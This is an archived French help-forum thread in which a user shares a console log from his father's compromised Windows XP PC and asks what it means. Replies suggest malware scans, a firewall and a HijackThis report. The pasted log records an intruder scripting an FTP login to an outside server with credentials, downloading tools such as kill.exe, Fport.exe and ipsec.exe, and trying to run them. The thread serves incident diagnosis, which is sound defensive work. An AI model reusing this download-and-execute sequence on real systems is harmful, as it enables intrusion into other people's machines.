Posté(e) le 7 février 200718 a salut a tous, je sais pas si c'est la bonne section mais c'est la plus appropriée a ma demande (a mon humble avis) voila, mon père etait sur son ordi lorsqu'il a remarqué quelquechose de bizarre: " Microsoft Windows XP [version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\HP_Administrateur>cd.. C:\Documents and Settings>cd.. C:\> cd windows C:\WINDOWS> cd system32 C:\WINDOWS\system32>echo open ftp.berg.heim.at 21>>c:\ftp C:\WINDOWS\system32>echo 442395>>c:\ftp C:\WINDOWS\system32>echo heim13>>c:\ftp C:\WINDOWS\system32>echo binary>>c:\ftp C:\WINDOWS\system32>echo get kill.exe>>c:\ftp C:\WINDOWS\system32>echo get Fport.exe>>c:\ftp C:\WINDOWS\system32>echo get dqr2.icm>>c:\ftp C:\WINDOWS\system32>echo get ipsec.exe>>c:\ftp C:\WINDOWS\system32>echo QUIT>>c:\ftp C:\WINDOWS\system32> C:\WINDOWS\system32>ftp -s:c:\ftp ftp> open ftp.berg.heim.at 21 Connecté à ftp.berg.heim.at. 220 BERG.HEIM.AT FTP-Server ready. Utilisateur (ftp.berg.heim.at:(none)) : 331 Password required for 442395. 230 Willkommen HEIM.AT Einwohner 442395. ftp> binary 200 Type set to I. ftp> get kill.exe 200 PORT command successful. 150 Opening BINARY mode data connection for kill.exe (21468 bytes). 226 Transfer complete. ftp : 21468 octets reçus en 5,97 secondes à 3,60 Ko/sec. ftp> get Fport.exe 200 PORT command successful. 150 Opening BINARY mode data connection for Fport.exe (114688 bytes). 226 Transfer complete. ftp : 114688 octets reçus en 3,81 secondes à 30,08 Ko/sec. ftp> get dqr2.icm 200 PORT command successful. 150 Opening BINARY mode data connection for dqr2.icm (2937 bytes). 226 Transfer complete. ftp : 2937 octets reçus en 9,03 secondes à 0,33 Ko/sec. ftp> get ipsec.exe 200 PORT command successful. 150 Opening BINARY mode data connection for ipsec.exe (770048 bytes). > ftp: get :Connexion réinitialisée par l'homologue ftp> QUIT C:\WINDOWS\system32>ipsec.exe /s Accès refusé. C:\WINDOWS\system32>ipsec.exe /i Accès refusé. C:\WINDOWS\system32>net start IPSEC " voila, je sais pas ce que c'est donc si vous pouviez m'eclairer bonne soirée
Posté(e) le 7 février 200718 a Scanne ton dossier system32 et puis, il a un firewall le pc à ton père .... ? parce que, une application qui fait ca, sans trop savoir par quoi elle a été lancé euh ... je sais pas c'est trop bizarre, moi jte dis SCANNE !!! >>>>>http://www.auditmypc.com/process/fport.asp je pense que c'est un virus/trojan/ver/saloperie
Posté(e) le 7 février 200718 a Auteur analyse en cours avec ad-aware par contre est ce que l'un dentre vous se rappelle du site internet qui analyse les processus en cours et qui nous dit lesquels sont "mechants" ??
Posté(e) le 7 février 200718 a analyse en cours avec ad-aware par contre est ce que l'un dentre vous se rappelle du site internet qui analyse les processus en cours et qui nous dit lesquels sont "mechants" ?? Salut, scans en ligne dans les centralisations antivirus et antispys. Désactive ta restauration système scanne evec HitmanPro et a²-free si possible en mode sans échec installe un pare-feu (vois aussi cette centralisation là). passe un coup de Ccleaner. Aprés, et aprés seulement, poste un rapport HijackThis dans la centralisation du même nom. Tiens au courant.
Posté(e) le 7 février 200718 a Salut, analyse en cours avec ad-aware Mouais ... Analyse ton poste ici > http://webscanner.kaspersky.fr/
Posté(e) le 7 février 200718 a scanne evec HitmanPro et a²-free si possible en mode sans échec Pour a-squared free, toujours penser à bien vérifier les résultats (très performants mais quelques faux positifs). Tu as quoi comme anti-virus ?
Posté(e) le 7 février 200718 a Auteur un mac affee perimé depuis pas mal de temps le probleme est que cet ordi sert de passerel mais a un probleme avec son disque dur donc il est très très lent (10mn pour afficher le menu demarrer ^^)
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.